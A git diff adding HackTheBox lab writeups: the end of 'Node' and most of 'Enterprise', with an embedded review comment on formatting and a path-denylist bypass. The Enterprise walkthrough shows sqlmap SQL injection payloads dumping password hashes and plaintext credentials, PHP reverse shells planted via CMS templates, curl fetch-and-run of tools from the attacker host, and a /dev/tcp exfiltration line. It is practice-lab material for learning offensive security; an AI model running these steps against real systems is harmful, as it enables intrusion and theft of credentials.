+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → 7z e user.zip
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 245 bytes (1 KiB)
+
+ Extracting archive: user.zip
+ --
+ Path = user.zip
+ Type = zip
+ Physical Size = 245
+
+
+ Enter password (will not be echoed):
+ Everything is Ok
+
+ Size: 33
+ Compressed: 245
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat user.txt
+ e1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the user flag ! now let's do the same with the root flag :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nano root.zip.b64
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat root.zip.b64| base64 -d > root.zip
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file root.zip
+ root.zip: Zip archive data, at least v1.0 to extract
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → 7z e root.zip
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 3858 bytes (4 KiB)
+
+ Extracting archive: root.zip
+ --
+ Path = root.zip
+ Type = zip
+ Physical Size = 3858
+
+
+ Enter password (will not be echoed):
+
+ Would you like to replace the existing file:
+ Path: ./root.txt
+ Size: 2584 bytes (3 KiB)
+ Modified: 2017-09-02 23:51:30
+ with the file from archive:
+ Path: root/root.txt
+ Size: 33 bytes (1 KiB)
+ Modified: 2017-09-03 14:46:40
+ ? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? A
+
+ Everything is Ok
+
+ Folders: 3
+ Files: 7
+ Size: 4268
+ Compressed: 3858
+
+
+Giving it the password "magicword" we successfully unzip it just like the previous zip file we decoded :
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat root.txt
+ 17XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we have the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
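Review bot: the base64 dump of the root backup in this hunk has been wrapped onto continuation lines that lack the leading `+` (the lines starting `tFQwIGW7ZlTXyRhNB+sBWOPA06...` and `AAAAAAAAAAAAAAAAUAGAAAAAAAAAAQAMBB...`), so `git apply` will reject the hunk as a corrupt patch; keep each output line on a single `+` line or, better, truncate the blob with `[...]` the way the Enterprise writeup does for its sqlmap output, since a multi-kilobyte opaque string gives the reader nothing to work with. Two smaller fixes in the same region: `**45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474**` sits inside an indented code block, where markdown prints the asterisks literally instead of bolding the key, and `arguements` / `sanitiszation` should read `arguments` / `sanitization`. The radare2 paragraphs ("in this function we see that we have a sanitiszation happening...", "in this function we see that we are also unable to give it the /root parameter") refer to screenshots that are not part of the diff, so they currently describe images the reader cannot see; add the images or state the check in text. Finally, the bypass paragraph ("Because we are ALREADY at / we don't need to say /root which is a bad character") would benefit from one sentence on why it works: the binary compares the raw argument against a denylist of substrings (`..`, `/root`, `/etc`, `//`, `/`, shell metacharacters), so any argument that resolves to the same target without containing a forbidden substring passes, which is the usual argument for canonicalising the path (realpath) and checking it against an allowlist of permitted directories instead of filtering strings.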
diff --git a/Medium/14.md b/Medium/14.md
new file mode 100644
index 0000000..da1e6ff
--- /dev/null
+++ b/Medium/14.md
@@ -0,0 +1,928 @@
+# Enterprise Writeup
+
+
+
+## Introduction :
+
+Enterprise is a medium linux box released back in October 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nmap --top-ports 65000 10.10.10.61 -F
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 18:08 GMT
+ Nmap scan report for 10.10.10.61
+ Host is up (0.093s latency).
+ Not shown: 8315 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 443/tcp open https
+ 5355/tcp filtered llmnr
+ 8080/tcp open http-proxy
+
+ Nmap done: 1 IP address (1 host up) scanned in 43.10 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nmap -sCV -p22,80,443,5355,8080 10.10.10.61
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 18:09 GMT
+ Nmap scan report for 10.10.10.61
+ Host is up (0.096s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 c4:e9:8c:c5:b5:52:23:f4:b8:ce:d1:96:4a:c0:fa:ac (RSA)
+ | 256 f3:9a:85:58:aa:d9:81:38:2d:ea:15:18:f7:8e:dd:42 (ECDSA)
+ |_ 256 de:bf:11:6d:c0:27:e3:fc:1b:34:c0:4f:4f:6c:76:8b (ED25519)
+ 80/tcp open http Apache httpd 2.4.10 ((Debian))
+ |_http-generator: WordPress 4.8.1
+ |_http-server-header: Apache/2.4.10 (Debian)
+ |_http-title: USS Enterprise - Ships Log
+ 443/tcp open ssl/http Apache httpd 2.4.25 ((Ubuntu))
+ |_http-server-header: Apache/2.4.25 (Ubuntu)
+ |_http-title: Apache2 Ubuntu Default Page: It works
+ | ssl-cert: Subject: commonName=enterprise.local/organizationName=USS Enterprise/stateOrProvinceName=United Federation of Planets/countryName=UK
+ | Not valid before: 2017-08-25T10:35:14
+ |_Not valid after: 2017-09-24T10:35:14
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ 5355/tcp filtered llmnr
+ 8080/tcp open http Apache httpd 2.4.10 ((Debian))
+ |_http-generator: Joomla! - Open Source Content Management
+ | http-open-proxy: Potentially OPEN proxy.
+ |_Methods supported:CONNECTION
+ | http-robots.txt: 15 disallowed entries
+ | /joomla/administrator/ /administrator/ /bin/ /cache/
+ | /cli/ /components/ /includes/ /installation/ /language/
+ |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
+ |_http-server-header: Apache/2.4.10 (Debian)
+ |_http-title: Home
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 23.47 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up 2 http services running on port 80 and 8080 so we dirbust them both :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → dirb http://10.10.10.61
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Wed Mar 4 18:11:46 2020
+ URL_BASE: http://10.10.10.61/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.61/ ----
+ + http://10.10.10.61/server-status (CODE:403|SIZE:299)
+
+ ==> DIRECTORY: http://10.10.10.61/wp-admin/
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → dirb http://10.10.10.61:8080
+
+ -----------------
+ DIRB v2.22
+ By The Dark Raver
+ -----------------
+
+ START_TIME: Wed Mar 4 18:11:45 2020
+ URL_BASE: http://10.10.10.61:8080/
+ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
+
+ -----------------
+
+ GENERATED WORDS: 4612
+
+ ---- Scanning URL: http://10.10.10.61:8080/ ----
+ + http://10.10.10.61:8080/0 (CODE:200|SIZE:7678)
+ + http://10.10.10.61:8080/01 (CODE:200|SIZE:8286)
+ + http://10.10.10.61:8080/02 (CODE:200|SIZE:8595)
+ + http://10.10.10.61:8080/1 (CODE:200|SIZE:8285)
+ + http://10.10.10.61:8080/1x1 (CODE:200|SIZE:8287)
+ + http://10.10.10.61:8080/2 (CODE:200|SIZE:8594)
+ + http://10.10.10.61:8080/2g (CODE:200|SIZE:8595)
+ + http://10.10.10.61:8080/about (CODE:200|SIZE:8160)
+ + http://10.10.10.61:8080/About (CODE:200|SIZE:8160)
+ ==> DIRECTORY: http://10.10.10.61:8080/administrator/
+ ==> DIRECTORY: http://10.10.10.61:8080/bin/
+ ==> DIRECTORY: http://10.10.10.61:8080/cache/
+ ==> DIRECTORY: http://10.10.10.61:8080/components/
+
+
+So as our nmap scan picked up, we have wordpress running on port 80, and joomla running on port 8080 and investigating port 443 we get yet another webpage which is the default apache successful installation page
+
+Now dirbusting a https is long and tedious but we find the /files directory nonetheless :
+
+
+
+so we download it locally (wget --no-check-certificate) and try to unzip it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → wget https://10.10.10.61/files/lcars.zip --no-check-certificate
+ --2020-03-05 06:26:20-- https://10.10.10.61/files/lcars.zip
+ Connecting to 10.10.10.61:443... connected.
+ WARNING: The certificate of ‘10.10.10.61’ is not trusted.
+ WARNING: The certificate of ‘10.10.10.61’ doesn't have a known issuer.
+ WARNING: The certificate of ‘10.10.10.61’ has expired.
+ The certificate has expired
+ The certificate's owner does not match hostname ‘10.10.10.61’
+ HTTP request sent, awaiting response... 200 OK
+ Length: 1406 (1.4K) [application/zip]
+ Saving to: ‘lcars.zip’
+
+ lcars.zip 100%[===============================================>] 1.37K --.-KB/s in 0s
+
+ 2020-03-05 06:26:21 (14.0 MB/s) - ‘lcars.zip’ saved [1406/1406]
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → unzip lcars.zip
+ Archive: lcars.zip
+ inflating: lcars/lcars_db.php
+ inflating: lcars/lcars_dbpost.php
+ inflating: lcars/lcars.php
+
+
+now looking at lcars_db.php we see a few interesting things :
+
+
+
+number one being the php script including a wordpress php config, located in /var/www/html/wp-config.php which could possibly reveal additional information about the database being used, and at the bottom we see a sql query looking for the number (integer) of wp_post IDs which shows an apparent SQL Injection vulnerability, however because the $result variable is returning an array and whatever we try to inject won't be able to escape the echo statement.
+
+
+
+here the script is also using the /var/www/html/wp-config.php config, and preety much the same things as above but with 2 additional if statements which are additional checks against sql injections, however we see that whatever we try to query gets casted into integer type so we could write a simple python script, to try passing in numbers as query to inspect what information we can get from it.
+
+
+ import requests
+
+ url ="http://10.10.10.61/wp-content/plugins/lcars/lcars_dbpost.php?query="
+ for x in range(150):
+ tmp = url + str(x)
+ print(str(x),str(requests.get(tmp).text).strip())
+
+
+So once the python script saved, we execute it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nano script.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → python script.py
+ ('0', '')
+ ('1', 'Hello world!')
+ ('2', '')
+ ('3', 'Auto Draft')
+ ('4', 'Espresso')
+ ('5', 'Sandwich')
+ ('6', 'Coffee')
+ ('7', 'Home')
+ ('8', 'About')
+ ('9', 'Contact')
+ ('10', 'Blog')
+ ('11', 'A homepage section')
+ ('12', '')
+ ('13', 'enterprise_header')
+ ('14', 'Espresso')
+ ('15', 'Sandwich')
+ ('16', 'Coffee')
+ ('17', '')
+ ('18', '')
+ ('19', '')
+ ('20', '')
+ ('21', '')
+ ('22', '')
+ ('23', 'enterprise_header')
+ ('24', 'cropped-enterprise_header-1.jpg')
+ ('25', '')
+ ('26', '')
+ ('27', '')
+ ('28', '')
+ ('29', '')
+ ('30', 'Home')
+ ('31', '')
+ ('32', '')
+ ('33', '')
+ ('34', 'Yelp')
+ ('35', 'Facebook')
+ ('36', 'Twitter')
+ ('37', 'Instagram')
+ ('38', 'Email')
+ ('39', '')
+ ('40', 'Hello world!')
+ ('41', '')
+ ('42', '')
+ ('43', '')
+ ('44', '')
+ ('45', '')
+ ('46', '')
+ ('47', '')
+ ('48', '')
+ ('49', '')
+ ('50', '')
+ ('51', 'Stardate 49827.5')
+ ('52', 'Stardate 49827.5')
+ ('53', 'Stardate 50893.5')
+ ('54', 'Stardate 50893.5')
+ ('55', 'Stardate 52179.4')
+ ('56', 'Stardate 52179.4')
+ ('57', 'Stardate 55132.2')
+ ('58', 'Stardate 55132.2')
+ ('59', '')
+ ('60', '')
+ ('61', '')
+ ('62', '')
+ ('63', '')
+ ('64', '')
+ ('65', '')
+ ('66', 'Passwords')
+ ('67', 'Passwords')
+ ('68', 'Passwords')
+ ('69', 'YAYAYAYAY.')
+ ('70', 'YAYAYAYAY.')
+ ('71', 'test')
+ ('72', '')
+ ('73', '')
+ ('74', '')
+ ('75', '')
+ ('76', '')
+ ('77', '')
+ ('78', 'YAYAYAYAY.')
+ ('79', '')
+ ('80', '')
+ ('81', '')
+ ('82', '')
+ ('83', '')
+ ('84', '')
+ ('85', '')
+ ('86', '')
+ ('87', '')
+ ('88', '')
+ ('89', '')
+ ('90', '')
+ ('91', '')
+ ('92', '')
+ ('93', '')
+ ('94', '')
+ ('95', '')
+ ('96', '')
+ ('97', '')
+ ('98', '')
+ ('99', '')
+ ('100', '')
+
+
+even though the page has 5 posts, according to our results it has quite a few more, so maybe our script isn't all that great, for lcars_db.php we'll use sqlmap instead :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → sqlmap -u http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php\?query\=1 --dbs
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.4.2#stable}
+ |_ -| . [.] | .'| . |
+ |___|_ [(]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 07:10:04 /2020-03-05/
+
+ [07:10:04] [INFO] testing connection to the target URL
+ [07:10:05] [INFO] checking if the target is protected by some kind of WAF/IPS
+ [07:10:05] [INFO] testing if the target URL content is stable
+ [07:10:05] [INFO] target URL content is stable
+ [07:10:05] [INFO] testing if GET parameter 'query' is dynamic
+ [07:10:06] [WARNING] GET parameter 'query' does not appear to be dynamic
+ [07:10:06] [WARNING] heuristic (basic) test shows that GET parameter 'query' might not be injectable
+ [07:10:06] [INFO] testing for SQL injection on GET parameter 'query'
+ [07:10:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ [07:10:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
+ [07:10:09] [INFO] GET parameter 'query' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --string="fatal")
+ [07:10:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
+ [07:10:13] [INFO] GET parameter 'query' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
+ it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
+ for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
+ [07:10:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
+ [07:10:48] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
+ [07:10:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
+ [07:10:52] [INFO] target URL appears to have 1 column in query
+ [07:10:53] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
+ [07:10:57] [INFO] target URL appears to be UNION injectable with 1 columns
+ GET parameter 'query' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
+ sqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests:
+ ---
+ Parameter: query (GET)
+ Type: boolean-based blind
+ Title: Boolean-based blind - Parameter replace (original value)
+ Payload: query=(SELECT (CASE WHEN (5644=5644) THEN 1 ELSE (SELECT 2592 UNION SELECT 3911) END))
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: query=1 AND (SELECT 9520 FROM(SELECT COUNT(*),CONCAT(0x716a7a7171,(SELECT (ELT(9520=9520,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+ ---
+ [07:11:02] [INFO] the back-end DBMS is MySQL
+ back-end DBMS: MySQL >= 5.0
+ [07:11:04] [INFO] fetching database names
+ [07:11:04] [INFO] retrieved: 'information_schema'
+ [07:11:05] [INFO] retrieved: 'joomla'
+ [07:11:05] [INFO] retrieved: 'joomladb'
+ [07:11:05] [INFO] retrieved: 'mysql'
+ [07:11:05] [INFO] retrieved: 'performance_schema'
+ [07:11:06] [INFO] retrieved: 'sys'
+ [07:11:06] [INFO] retrieved: 'wordpress'
+ [07:11:06] [INFO] retrieved: 'wordpressdb'
+ available databases [8]:
+ [*] information_schema
+ [*] joomla
+ [*] joomladb
+ [*] mysql
+ [*] performance_schema
+ [*] sys
+ [*] wordpress
+ [*] wordpressdb
+
+
+
+And we found a few databases !
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → sqlmap -u http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php\?query\=1 -D wordpress -T wp_users -C user_login,user_pass,user_email --dump --hex --threads 5
+ ___
+ __H__
+ ___ ___[.]_____ ___ ___ {1.4.2#stable}
+ |_ -| . ["] | .'| . |
+ |___|_ [(]_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 07:59:46 /2020-03-05/
+
+ [...]
+
+
+ DB:wordpress
+
+ Table:wp_users
+ user : william.riker
+ pass : $P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.
+ email : william.riker@enterprise.htb
+
+ Table:wp_posts
+ I got 1 draft post including password list
+
+ Needed somewhere to put some passwords quickly
+ ZxJyhGem4k338S2Y
+ enterprisencc170
+ ZD3YxfnSjezg67JZ
+ u*Z14ru0p#ttj83zS6
+
+ DB: joomladb
+ prefix : edz2g
+
+ Command : sqlmap -u http://10.10.10.61/wp-content/plugins/lcars/lcars_db.php?query=1 -D joomladb -T edz2g_users -C username,password,email --dump --threads 10
+ Table : edz2g_users
+ +-----------------+--------------------------------------------------------------+--------------------------------+
+ | username | password | email |
+ +-----------------+--------------------------------------------------------------+--------------------------------+
+ | geordi.la.forge | $2y$10$cXSgEkNQGBBUneDKXq9gU.8RAf37GyN7JIrPE7us9UBMR9uDDKaWy | geordi.la.forge@enterprise.htb |
+ | Guinan | $2y$10$90gyQVv7oL6CCN8lF/0LYulrjKRExceg2i0147/Ewpb6tBzHaqL2q | guinan@enterprise.htb |
+ +-----------------+--------------------------------------------------------------+--------------------------------+
+
+ DB: mysql
+ user: joomladb | 2eb70fd4eb74f31283541aad4e83ab6e077bc0df MySQL4.1/MySQL5 : joomlapassword!
+ user: root | 95b8a7b0a041cf2011bea41db57315c603285253 MySQL4.1/MySQL5 : NCC-1701E
+ user:wordpressdb | 10c910bc9c2c46140dc275cb69dc6565de125630 MySQL4.1/MySQL5 : passwordwordpress
+
+
+From there, we have a few credentials to work with, let's try **william.riker:u*Z14ru0p#ttj83zS6** on the wordpress admin pannel :
+
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Enterprise]
+ → echo '10.10.10.61 enterprise.htb' >> /etc/hosts
+
+
+
+` 
+
+And we are logged in! now we move over to the themes tab to upload our reverse shell :
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → locate nihilist.php
+ /home/nihilist/_HTB/Bastard/nihilist.php
+ /home/nihilist/_HTB/Cronos/nihilist.php
+ /home/nihilist/_HTB/Haircut/nihilist.php
+ /home/nihilist/_HTB/Networked/nihilist.php.gif
+ /home/nihilist/_HTB/October/nihilist.php5
+ /home/nihilist/_HTB/Popcorn/nihilist.php
+ /home/nihilist/_HTB/Popcorn/nihilist.php.gif
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → cp /home/nihilist/_HTB/Popcorn/nihilist.php .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nano nihilist.php
+
+
+` 
+
+Once modified we move over to the 404.php file we modified containing our reverse shell :
+
+
+
+And trying to print out the user flag we get a troll, so we need to see what we have to do from here.
+
+
+ www-data@b8319d86d21e:/home$ hostname
+ hostname
+ b8319d86d21e
+ www-data@b8319d86d21e:/home$ ip addr
+ ip addr
+ 1: lo: <****LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
+ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
+ inet 127.0.0.1/8 scope host lo
+ valid_lft forever preferred_lft forever
+ 8: eth0@if9: <****BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
+ link/ether 02:42:ac:11:00:04 brd ff:ff:ff:ff:ff:ff
+ inet 172.17.0.4/16 scope global eth0
+ valid_lft forever preferred_lft forever
+
+From here we see that the current box that we are on , logged in as www-data. we can move in /tmp, and download LinEnum to execute and see what we can do on the box
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → locate LinEnum.sh
+ /home/nihilist/_HTB/Cronos/LinEnum.sh
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → cp /home/nihilist/_HTB/Cronos/LinEnum.sh .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+
+ www-data@b8319d86d21e:/home$ cd /tmp && curl -O http://10.10.14.11:8080/LinEnum.sh && chmod +x LinEnum.sh && ./LinEnum.sh
+
+
+Looking at the results, we see that we are actually WITHIN a docker container, and somehow we have to break free from it. our current ip address within the box is 172.17.0.4/16 so let's see if we can ping any other ip address within this range :
+
+
+ www-data@b8319d86d21e:/home$ for x in $(seq 1 255); do ping -W 1 -c 1 172.17.0.$x | grep from; done
+ <$ for x in $(seq 1 255); do ping -W 1 -c 1 172.17.0.$x | grep from; done
+ 64 bytes from 172.17.0.1: icmp_seq=0 ttl=64 time=0.153 ms
+ 64 bytes from 172.17.0.2: icmp_seq=0 ttl=64 time=0.091 ms
+ 64 bytes from 172.17.0.3: icmp_seq=0 ttl=64 time=0.151 ms
+ 64 bytes from 172.17.0.4: icmp_seq=0 ttl=64 time=0.041 ms
+
+
+And looking at it, we seem to be able to ping 3 other ip addresses (172.17.0.4 being our docker container.) now running**which nc** we see that netcat isn't available for us, so we have to download a binary locally and then upload it using wget/SimpleHTTPServer like before
+
+
+ www-data@b8319d86d21e:/tmp$ curl -O http://10.10.14.11:8080/nc && chmod +x nc
+ curl -O http://10.10.14.11:8080/nc && chmod +x nc
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 35520 100 35520 0 0 34016 0 0:00:01 0:00:01 --:--:-- 34022
+ www-data@b8319d86d21e:/tmp$ ls -lash
+ ls -lash
+ total 128K
+ 4.0K drwxrwxrwt 3 root root 4.0K Mar 5 08:51 .
+ 4.0K drwxr-xr-x 73 root root 4.0K Sep 6 2017 ..
+ 4.0K drwxr-xr-x 2 www-data www-data 4.0K Sep 7 2017 .sam
+ 36K -rwxr-xr-x 1 www-data www-data 35K Mar 5 08:51 nc
+ 60K -rw------- 1 www-data www-data 58K Oct 16 2017 sess_09dc3ceeb2cec4020caf3d94f3001509
+ 4.0K -rw------- 1 www-data www-data 60 Sep 8 2017 sess_71faa5ea6f4f1d51294af6db00072edd
+ 4.0K -rw------- 1 www-data www-data 917 Sep 8 2017 sess_b9c02f197e1c999b859d36e1e1040a6e
+ 8.0K -rw------- 1 www-data www-data 7.2K Oct 17 2017 sess_c84f999fe96f763f1e5928bb1ded0eae
+ 4.0K -rw------- 1 www-data www-data 60 Oct 20 2017 sess_f4abe5392ffbb75a6ecb22dd4af8accc
+
+
+
+From there we can scan the 3 ip addresses we found earlier :
+
+
+ www-data@b8319d86d21e:/tmp$./nc -vz 172.17.0.1 1-65535 2>/dev/stdout | grep 'succeeded!'
+ Connection to 172.17.0.1 22 port [tcp/ssh] succeeded!
+ Connection to 172.17.0.1 80 port [tcp/http] succeeded!
+ Connection to 172.17.0.1 443 port [tcp/https] succeeded!
+ Connection to 172.17.0.1 5355 port [tcp/hostmon] succeeded!
+ Connection to 172.17.0.1 8080 port [tcp/http-alt] succeeded!
+ Connection to 172.17.0.1 32812 port [tcp/*] succeeded!
+
+ www-data@b8319d86d21e:/tmp$./nc -vz 172.17.0.2 1-65535 2>/dev/stdout | grep 'succeeded!'
+ Connection to 172.17.0.2 3306 port [tcp/mysql] succeeded!
+
+ www-data@b8319d86d21e:/tmp$./nc -vz 172.17.0.3 1-65535 2>/dev/stdout | grep 'succeeded!'
+ Connection to 172.17.0.3 80 port [tcp/http] succeeded!
+
+
+
+Unfortunately we don't get to be able to do much more from here, so let's try and see what we can do from the joomla service running on port 8080 using the credentials we found earlier :
+
+
+ ZD3YxfnSjezg67JZ:geordi.la.forge
+ ZxJyhGem4k338S2Y:Guinan
+
+
+`  
+
+Once we are logged in , we go ahead and upload a php reverse shell, just like for the wordpress service by editing a php file :
+
+Extensions > Templates > Templates > Protostar
+
+ 
+
+Save the modified php file, and hit preview to execute the infected php file :
+
+
+
+And we seem to get into yet another docker container, this time as the 172.17.0.3
+
+
+ 172.17.0.1 (Host machine)
+ 172.17.0.3 (Joomla)
+ 172.17.0.4 (Wordpress)
+
+
+From there we can probably guess that **172.17.0.2** is the mysql server.
+
+
+ www-data@a7018bfdc454:/home$ mount -l
+ mount -l
+
+ [...]
+
+ **/dev/mapper/enterprise--vg-root on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+ /dev/mapper/enterprise--vg-root on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+ /dev/mapper/enterprise--vg-root on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+ /dev/mapper/enterprise--vg-root on /var/www/html type ext4 (rw,relatime,errors=remount-ro,data=ordered)
+ /dev/mapper/enterprise--vg-root on /var/www/html/files type ext4 (rw,relatime,errors=remount-ro,data=ordered)**
+ proc on /proc/bus type proc (ro,relatime)
+ proc on /proc/fs type proc (ro,relatime)
+ proc on /proc/irq type proc (ro,relatime)
+ proc on /proc/sys type proc (ro,relatime)
+ proc on /proc/sysrq-trigger type proc (ro,relatime)
+ tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
+ tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)
+ tmpfs on /proc/timer_stats type tmpfs (rw,nosuid,size=65536k,mode=755)
+ tmpfs on /proc/sched_debug type tmpfs (rw,nosuid,size=65536k,mode=755)
+ tmpfs on /sys/firmware type tmpfs (ro,relatime)
+
+ www-data@a7018bfdc454:/home$ cd /var/www/html/files
+ cd /var/www/html/files
+
+ www-data@a7018bfdc454:/var/www/html/files$ ls
+ ls
+ lcars.zip
+
+
+here we see that /var/www/html/files is mounted as the SAME /files directory we found on port 443 at the beginning
+
+
+
+Creating a quick file using the touch command, we see that we are effectively able to create files in the /files directory. so let's upload our reverse shell using curl just like the previous 2 times :
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.61] 54016
+ bash: cannot set terminal process group (1618): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@enterprise:/var/www/html/files$ cd /home
+ lcd /home
+ www-data@enterprise:/home$ s
+ ls
+ jeanlucpicard
+ www-data@enterprise:/home$ cd jeanlucpicard
+ cd jeanlucpicard
+ www-data@enterprise:/home/jeanlucpicard$ cat user.txt
+ cat user.txt
+ 08XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+and that's it ! we have the user flag.
+
+## **Part 3 : Getting Root Access**
+
+From there we go as usual into /tmp to upload and then execute LinEnum.sh, and looking at the results, we see that we have an interesting binary in /bin/lcars. so let's copy it locally :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nc -lp 9003 | base64 -d > lcars.binary && chmod +x lcars.binary
+
+
+` _Terminal 2:_
+
+
+ www-data@enterprise:/bin$ base64 lcars > /dev/tcp/10.10.14.11/9003
+ base64 lcars > /dev/tcp/10.10.14.11/9003
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → nc -lp 9003 | base64 -d > lcars.binary && chmod +x lcars.binary
+
